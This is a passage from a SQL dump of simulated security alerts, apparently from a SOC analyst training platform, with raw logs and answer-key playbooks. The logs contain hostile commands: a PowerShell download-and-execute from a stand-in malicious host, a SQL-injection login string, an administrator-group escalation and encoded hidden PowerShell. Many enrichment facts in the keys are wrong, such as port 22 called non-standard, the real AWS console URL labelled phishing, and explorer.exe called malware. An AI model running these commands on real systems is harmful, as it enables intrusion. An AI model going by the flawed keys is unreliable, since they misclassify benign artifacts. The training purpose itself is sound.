communication.\"}},{\"id\":\"artifact_5\",\"type\":\"port\",\"value\":\"22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"suspicious\",\"details\":\"Non-standard port 22 commonly used by malware for C2 communication.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High/Critical severity level; 15 failed login attempts detected\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (227, 'Unauthorized AWS Access Attempt Detected', 'high', 'AWS CloudTrail', 'An unauthorized login attempt was detected in AWS account using an anomalous IP address. IP address associated with known threat actor activities. This matches the MITRE ATT&CK technique for Valid Accounts (T1078).', 'Unauthorized Access', 'T1078', 1, 'New', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"AIDAEXAMPLEUSER\",\"arn\":\"arn:aws:iam::123456789012:user/example_user\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLEKEYID\",\"userName\":\"example_user\"},\"eventTime\":\"2023-10-12T14:55:55Z\",\"eventSource\":\"signin.amazonaws.com\",\"eventName\":\"ConsoleLogin\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"192.0.2.99\",\"userAgent\":\"Mozilla/5.0\",\"errorMessage\":\"Failed authentication\",\"requestParameters\":null,\"responseElements\":{\"ConsoleLogin\":\"Failure\"},\"additionalEventData\":{\"LoginTo\":\"https://console.aws.amazon.com/\",\"MobileVersion\":\"No\",\"MFAUsed\":\"No\"},\"eventID\":\"abcd1234-5678-90ab-cdef-EXAMPLE123456\",\"readOnly\":false,\"eventType\":\"AwsConsoleSignIn\",\"recipientAccountId\":\"123456789012\"}', '2025-12-25 05:00:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 192.0.2.99 reported 479 times for malicious activity. Abuse confidence score: 84%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"123456789012\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"example_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"Failure\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_5\",\"type\":\"geolocation\",\"value\":\"us-east-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"GeoIP Lookup\",\"verdict\":\"suspicious\",\"details\":\"Login from us-east-1 - unusual location for this user\'s typical access pattern.\"}},{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"https://console.aws.amazon.com/\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan.io\",\"verdict\":\"malicious\",\"details\":\"URL hosts credential harvesting page mimicking legitimate login portal.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (228, 'Unauthorized Access Attempt on Web Application', 'high', 'web_application_firewall', 'Detected multiple SQL injection attempts from a single IP address. The requests aimed at exploiting vulnerabilities in the login form.', 'intrusion_attempt', 'T1190: Exploit Public-Facing Application', 1, 'New', NULL, '{\"timestamp\":\"2023-10-24T14:35:23Z\",\"waf_id\":\"waf-01\",\"client_ip\":\"192.168.5.87\",\"request_method\":\"POST\",\"requested_url\":\"/login\",\"http_version\":\"HTTP/1.1\",\"alert_trigger\":\"SQL_Injection_Detect\",\"request_headers\":{\"Host\":\"example.com\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"},\"request_body\":\"username=admin\' OR \'1\'=\'1\' -- &password=pwd123\",\"rule_id\":\"981245\",\"rule_message\":\"Possible SQL injection attack detected\"}', '2025-12-25 05:55:11', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.87\",\"is_critical\":true,\"osint_result\":{\"source\":\"Network Analysis\",\"verdict\":\"internal\",\"details\":\"192.168.5.87 is a private/internal IP address (RFC 1918). This is an internal network address and cannot be looked up in external threat intelligence. Investigate internal logs for activity from this host.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"57/94 security vendors flagged this domain as malicious.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"unknown\",\"analysis_notes\":\"High/Critical severity level\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (229, 'Suspicious PowerShell Script Executed', 'high', 'endpoint', 'A PowerShell script was executed with potentially malicious behavior, indicating possible PowerShell exploitation tactics.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T14:22:11Z\",\"host\":\"DESKTOP-5GH7JAM\",\"user\":\"JohnDoe\",\"process_id\":4380,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoP -NonI -W Hidden -Enc WnNvR... (encapsulated malicious command)\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"parent_process_id\":374,\"parent_process_name\":\"explorer.exe\",\"integrity_level\":\"Medium\",\"session_id\":2}', '2025-12-25 15:32:46', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"JohnDoe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":null,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"54/72 security vendors identified this file as malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"powershell.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":null,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"File exhibits behavior consistent with malware: persistence mechanisms, network callbacks, code injection.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"High/Critical severity level; Alert type indicates malware/C2 activity; Alert type indicates suspicious script execution\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (230, 'Suspicious Domain Name Resolution Detected', 'high', 'DNS Security', 'A DNS request was made to a domain known for distributing malware. This domain has been flagged in multiple threat intelligence databases.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"victim-machine\",\"domain\":\"maliciousdomain.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2025-12-25 21:24:21', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 352 times for hosting malware distribution sites.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain linked to multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The domain and associated IP have been confirmed malicious through OSINT. Blocking the IP and isolating the host will prevent further compromise.\"}', 'Intermediate', 'TI', 1, 0, 'OT_ICS'), (231, 'Suspicious PSExec Activity Detected on Internal Network', 'high', 'CrowdStrike', 'A suspicious PSExec process was initiated from an internal machine attempting lateral movement across the network. The source machine is exhibiting signs of compromise.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION01\",\"file_hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"process_name\":\"psexec.exe\"}', '2025-12-25 21:27:43', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of source machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target machine\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash observed in known malware campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec and the malicious hash associated with known malware campaigns indicates a true positive for lateral movement within the network.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'), (233, 'Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'A phishing email was detected with a spoofed sender domain and a malicious URL intended to steal credentials.', 'Phishing', 'T1566', 1, 'Closed', 36, '{\"timestamp\":\"2023-10-01T09:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"email_sender\":\"noreply@secure-bank.com\",\"url\":\"http://secure-bank.com/login\",\"username\":\"target_user\"}', '2025-12-26 09:43:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for hosting phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-bank.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attempts\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@secure-bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered with no reputation\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a malicious URL that leads to a credential-stealing page.\"}', 'Advanced', 'NULL', 1, 0, NULL), (234, 'Suspicious Lateral Movement Detected via PSExec', 'medium', 'Wazuh', 'An internal host used PSExec to connect to multiple internal machines, indicating potential lateral movement.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T11:05:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"server-02\"}', '2025-12-26 15:36:00', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Source IP is within internal network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Destination IP is within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Admin account used for PSExec\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec by an admin account for lateral movement is suspicious and requires further investigation.\"}', 'Beginner', 'EDR', 1, 0, 'OT_ICS'), (235, 'False Positive: High Volume Network Traffic Alert', 'low', 'Firewall', 'An unusual spike in network traffic was detected originating from a trusted internal server, initially suspected as data exfiltration.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2023-10-01T13:45:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.100\",\"username\":\"service_account\",\"hostname\":\"data-server\"}', '2025-12-26 19:45:34', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine backup operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"External IP involved in regular data backup\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Service account used for scheduled data transfer\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The alert was triggered by a scheduled backup process, not malicious activity.\"}', 'Beginner', 'NDR', 1, 0, 'FINANCE'), (236, 'Unauthorized Access Attempt via Credential Brute Force Detected', 'high', 'Firewall', 'A high number of failed login attempts were detected from a single IP address. This is indicative of a brute force attack attempting to gain unauthorized access to the organization’s internal systems. See MITRE ATT&CK Technique T1110 for Brute Force examples.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T02:38:47Z\",\"source_ip\":\"192.0.2.45\",\"destination_ip\":\"203.0.113.5\",\"destination_port\":\"22\",\"event\":\"Failed login attempt\",\"username\":\"admin\",\"attempt_count\":150,\"device\":\"Firewall\",\"location\":\"New York, USA\",\"rule_triggered\":\"Brute Force Detection Policy\",\"log_id\":\"fw123456789\",\"session_id\":\"5d2b7c4f-e5c4-42b0-b5e1-d4f7e642b895\"}', '2025-12-26 05:00:04', '2026-01-11 01:09:19', NULL, 'Intermediate', 'SIEM', 1, 0, 'TECH'), (237, 'Suspicious PowerShell Script Execution', 'high', 'process', 'A PowerShell script was executed with commands commonly associated with file-less malware activity.', 'Malicious Script Execution', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2023-11-01T14:23:05.123Z\",\"hostname\":\"DESKTOP-7GTB8K3\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"pid\":4521,\"cmdline\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com/script.ps1\')\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"parent_process\":\"explorer.exe\",\"parent_pid\":3428,\"network_activity\":{\"url_accessed\":\"http://malicious.example.com/script.ps1\",\"resolved_ip\":\"192.0.2.123\"}}', '2025-12-26 05:41:40', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"109.12.97.181\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'GOVERNMENT'), (238, 'Suspicious Admin Privilege Escalation Detected', 'high', 'process', 'A process was initiated to grant administrative privileges using a seldom used elevated command, indicating potential privilege escalation.', 'Privilege_Escalation', 'T1055 - Process Injection', 1, 'New', NULL, '{\"timestamp\":\"2023-10-23T14:35:29Z\",\"hostname\":\"finance-server-01\",\"username\":\"jdoe\",\"process_name\":\"cmd.exe\",\"cmdline\":\"cmd.exe /c net localgroup administrators jdoe /add\",\"file_hash\":\"8c7b59a2e13572bf7c147de025d3d02123f7988c\",\"pid\":2356,\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1024,\"user_domain\":\"CORP\",\"event_id\":4678,\"source_ip\":\"192.168.5.10\"}', '2025-12-26 05:57:25', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"32.46.140.23\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (239, 'Suspicious Remote Code Execution Detected', 'high', 'Endpoint Protection', 'A potential remote code execution was detected on an endpoint, involving a suspicious PowerShell command executed via obfuscation tactics.', 'process', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2023-10-25T14:23:07Z\",\"endpoint_id\":\"WIN-7G8H9JKL01\",\"event_id\":4103,\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell.exe -nop -w hidden -enc WwBTAFUAUgByAFIAXABfAGsAYgB5AHAANQBoAGYAMQBzAC0AaQBzAGMAbwBtAG0AYQBuAGQAXQB7AGU...\",\"integrity_level\":\"High\",\"parent_process\":{\"name\":\"explorer.exe\",\"pid\":4568},\"file_hash\":{\"md5\":\"3b3f6bf0277b2973ff07371d5c6efbff\",\"sha1\":\"42ebf3a68eee911d85c9d6041d3b8e4c4ecf6dd2\"},\"user\":\"DOMAIN\\\\jdoe\",\"network_activity\":{\"outbound\":true,\"destination_ip\":\"10.0.0.75\",\"destination_port\":80}}', '2025-12-26 05:44:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"25.133.105.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 25.133.105.171 reported 454 times for malicious activity. Abuse confidence score: 85%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"system\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (240, 'Suspicious PowerShell Command Execution', 'medium', 'endpoint', 'A potentially malicious PowerShell script was executed on the endpoint. The script uses encoded command obfuscation techniques.', 'process', 'T1059.001', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-10T14:32:58Z\",\"hostname\":\"Workstation-23\",\"username\":\"jane.doe\",\"process_name\":\"powershell.exe\",\"pid\":4567,\"parent_process\":\"explorer.exe\",\"ppid\":789,\"cmdline\":\"powershell.exe -NoProfile -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AYQBnAGs\",\"file_hash\":\"3f50f0a35cc9b36fc3f0e1f2b0cf3a78\",\"user_domain\":\"CORP\",\"integrity_level\":\"High\",\"command_length\":43}', '2025-12-27 05:37:34', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"242.96.134.59\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP 242.96.134.59 has 0% abuse confidence score. Located in corporate network range.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"User accessed from known location during normal business hours. Activity consistent with role.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL), (241, 'Suspicious Command Execution Detected', 'medium', 'process', 'A suspicious command execution was detected involving base64 encoding of an unknown script.', 'Potential Obfuscation or Encoding', 'T1027 - Obfuscated Files or Information', 0, 'Closed', 41, '{\"timestamp\":\"2023-10-12T14:23:34Z\",\"hostname\":\"workstation-7F5D\",\"username\":\"j.doe\",\"process_name\":\"powershell.exe\",\"cmdline\":\"powershell -NoProfile -Command Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://malicious.example/script\')\",\"file_hash\":\"sha256:d8a1c4cbf1e1367c2c6fd589v71c4c6f2b3d8e56ab60dcd526bfed9f2b68be23\",\"parent_process_name\":\"explorer.exe\",\"parent_pid\":1020,\"pid\":3284,\"event_id\":4688,\"event_message\":\"A new process has been created\"}', '2025-12-27 05:01:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"100.56.249.171\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 100.56.249.171 reported 173 times for malicious activity. Abuse confidence score: 93%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NULL', 1, 0, NULL), (242, 'Suspicious PowerShell Script Execution Detected', 'high', 'endpoint', 'A potentially malicious PowerShell script with obfuscated code has been executed on an endpoint.', 'Process Execution', 'T1059.001', 1, 'investigating', 41, '{\"timestamp\":\"2023-11-01T14:32:16Z\",\"hostname\":\"DESKTOP-7GTHB9K\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"process_id\":2678,\"cmdline\":\"powershell.exe -NoP -NonI -W Hidden -E JABzAHQAcgAgAD0AIABOAGUAdwAtAE8AYgBqAGU... (truncated)\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"file_hash\":\"2B2B6D120897FBB5783C3F8DCF57DBBA\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1744,\"network_activity\":{\"dest_ip\":\"192.168.1.10\",\"dest_port\":80},\"registry_modifications\":{\"key\":\"HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command\",\"value\":\"calc.exe\"}}', '2025-12-27 05:08:14', '2026-01-11 01:09:19', '{\"correct_verdict\":\"True Positive\",\"triage_answer\":\"Suspicious\",\"containment_answer\":\"Isolate Host\",\"scenario\":{\"ip\":\"162.113.139.213\",\"files\":[{\"name\":\"unknown_tool.ps1\",\"type\":\"script\",\"status\":\"SUSPICIOUS\"}],\"email_subject\":null}}', 'Intermediate', 'NULL', 1, 0, NULL), (243, 'Critical RDP Brute Force Attack Detected', 'critical', 'Firewall', 'Multiple failed RDP login attempts were detected from a single external IP address, indicating a brute force attack. This pattern of behavior is consistent with tactics outlined in cybersecurity incidents, such as the worldwide brute force attacks on RDP services in 2021.', 'Brute Force', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2023-10-24T18:35:24Z\",\"src_ip\":\"192.168.1.25\",\"dest_ip\":\"10.0.0.4\",\"attempt_count\":45,\"usernames_attempted\":[\"admin\",\"guest\",\"user1\"],\"protocol\":\"RDP\",\"event\":\"Failed login attempt\",\"firewall_id\":\"fw-12345678\",\"region\":\"us-west-2\",\"request_id\":\"req-abc123\",\"message\":\"Login failed due to incorrect credentials\",\"related_events\":[{\"timestamp\":\"2023-10-24T18:32:03Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Login attempt\"},{\"timestamp\":\"2023-10-24T18:34:16Z\",\"src_ip\":\"192.168.1.25\",\"event\":\"Connection established\"}],\"geo_location\":{\"country\":\"Unknown\",\"region\":\"Unknown\"}}', '2025-12-27 05:00:06', '2026-01-11 01:09:19', NULL, 'Advanced', 'SIEM', 1, 0, 'OT_ICS'), (244, 'Malware Detected on Endpoint via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process execution was detected on an internal machine, indicating potential malware activity. The process was associated with a known malicious hash.', 'Malware', 'T1059', 1, 'investigating', 65, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":null,\"username\":\"jdoe\",\"hostname\":\"workstation-1\",\"file_hash\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"process_name\":\"malicious.exe\"}', '2025-12-27 15:13:22', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5d2c7e1d4b8f9a6a7f8b2d3a4c5d6e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware reports\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious file hash on an internal machine, executed by a suspicious process, confirms this as a true malware incident.\"}', 'Intermediate', 'NULL', 1, 0, NULL), (245, 'Malware Detected - Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious executable was detected running on the host, potentially indicating malware activity. The process attempted to connect to a known malicious C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-05T14:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2025-12-29 00:07:31', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as Trojan by 45 AV vendors\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash and external IP both have malicious indicators, confirming the detection of malware.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (246, 'Phishing Attempt Detected - Malicious Email Link', 'medium', 'Proofpoint', 'A phishing email was received containing a malicious link attempting to harvest credentials. The sender\'s domain is known for phishing activities.', 'Phishing', 'T1566', 1, 'New', NULL, 